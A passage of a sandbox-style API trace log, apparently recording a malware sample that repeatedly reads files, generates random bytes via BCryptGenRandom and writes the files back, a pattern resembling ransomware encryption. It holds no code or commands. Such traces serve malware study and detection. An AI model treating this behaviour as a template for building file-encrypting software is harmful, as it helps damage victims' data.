lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0199.744] CloseHandle (hObject=0x170) returned 1 [0199.744] free (_Block=0x3df0008) [0199.744] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0199.750] ReadFile (in: hFile=0x338, lpBuffer=0x3d70484, nNumberOfBytesToRead=0xd42, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0199.750] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0199.760] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.760] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.761] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0199.761] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.761] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.761] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0199.761] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0199.761] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0199.761] free (_Block=0x3e305b8) [0199.761] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0199.761] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0199.762] free (_Block=0x1fa91d0) [0199.762] free (_Block=0x1fa2ed8) [0199.762] free (_Block=0x1fa90b8) [0199.762] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0199.762] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0199.763] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.764] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.764] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0199.764] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.764] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.764] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0199.765] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0199.765] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0199.765] free (_Block=0x3e305b8) [0199.765] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0199.765] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0199.765] free (_Block=0x1fa91d0) [0199.765] free (_Block=0x77d7a8) [0199.765] free (_Block=0x1fa90b8) [0199.765] WriteFile (in: hFile=0x308, lpBuffer=0x3f7007c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 1 [0199.766] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0199.766] CloseHandle (hObject=0x170) returned 1 [0199.770] free (_Block=0x3df0008) [0199.770] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0199.796] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x994, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0199.796] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0199.804] ReadFile (in: hFile=0x170, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0xc9e, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0199.804] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0199.816] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.816] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.816] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0199.816] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.817] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.817] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0199.817] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0199.817] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0199.817] free (_Block=0x3e305b8) [0199.817] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0199.817] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0199.818] free (_Block=0x1fa91d0) [0199.818] free (_Block=0x1fa2ed8) [0199.818] free (_Block=0x1fa90b8) [0199.818] WriteFile (in: hFile=0x338, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0199.818] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0199.896] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xde0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0199.897] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0199.907] WriteFile (in: hFile=0x338, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x5b0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0199.907] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0199.909] ReadFile (in: hFile=0x170, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x5b4, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0199.909] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0199.909] CloseHandle (hObject=0x170) returned 1 [0199.909] free (_Block=0x3d70450) [0199.909] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0199.924] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.925] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.925] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0199.925] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.925] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.925] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0199.925] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0199.925] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0199.925] free (_Block=0x3e305b8) [0199.925] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0199.925] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0199.926] free (_Block=0x1fa91d0) [0199.926] free (_Block=0x1fa2ed8) [0199.926] free (_Block=0x1fa90b8) [0199.926] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0199.926] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0199.934] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.934] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.934] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0199.934] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.935] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.935] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0199.935] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0199.935] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0199.935] free (_Block=0x3e305b8) [0199.935] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0199.935] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0199.935] free (_Block=0x1fa91d0) [0199.935] free (_Block=0x1fa2ed8) [0199.935] free (_Block=0x1fa90b8) [0199.935] WriteFile (in: hFile=0x170, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0199.936] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0199.942] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.942] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.942] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0199.942] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.943] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.943] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0199.943] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0199.943] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0199.943] free (_Block=0x3e305b8) [0199.943] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0199.943] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0199.943] free (_Block=0x1fa91d0) [0199.943] free (_Block=0x1fa2ed8) [0199.943] free (_Block=0x1fa90b8) [0199.944] WriteFile (in: hFile=0x338, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0199.944] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0199.984] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x570, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0199.984] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0199.990] WriteFile (in: hFile=0x338, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x830, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0199.990] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0199.998] WriteFile (in: hFile=0x170, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x820, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0199.999] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0200.001] ReadFile (in: hFile=0x308, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x8da, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 1 [0200.001] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0200.001] CloseHandle (hObject=0x308) returned 1 [0200.001] free (_Block=0x3f70048) [0200.001] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0200.012] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0200.012] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0200.012] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0200.012] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0200.012] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0200.012] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0200.013] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0200.013] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0200.013] free (_Block=0x3e305b8) [0200.013] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0200.013] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0200.013] free (_Block=0x1fa91d0) [0200.013] free (_Block=0x1fa2ed8) [0200.013] free (_Block=0x1fa90b8) [0200.013] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0200.013] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0200.013] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x8e0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0200.014] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0200.210] WriteFile (in: hFile=0x308, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0xfc0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0200.211] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0200.223] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x1b28, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0200.242] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0200.242] CloseHandle (hObject=0x3cc) returned 1 [0200.242] free (_Block=0x3df0008) [0200.242] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0200.254] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0200.254] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0200.254] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0200.254] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0200.255] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0200.255] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0200.255] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0200.255] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0200.255] free (_Block=0x3e305b8) [0200.255] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0200.255] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0200.255] free (_Block=0x1fa91d0) [0200.255] free (_Block=0x1fa2ed8) [0200.256] free (_Block=0x1fa90b8) [0200.256] WriteFile (in: hFile=0x308, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x612, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0200.256] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0200.256] WriteFile (in: hFile=0x308, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0xc70, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0200.256] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0200.288] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xc4c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0200.288] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0200.291] ReadFile (in: hFile=0x308, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x738, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0200.291] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0200.324] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x704, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0200.324] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0200.325] CloseHandle (hObject=0x170) returned 1 [0200.325] free (_Block=0x3d70450) [0200.325] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0200.788] ReadFile (in: hFile=0x3cc, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x7fc, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0200.788] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0200.790] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x6a4, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0200.790] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0200.838] ReadFile (in: hFile=0x308, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x1212, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0200.848] GetQueuedCompletionStatus (in: CompletionPort=0x14c, 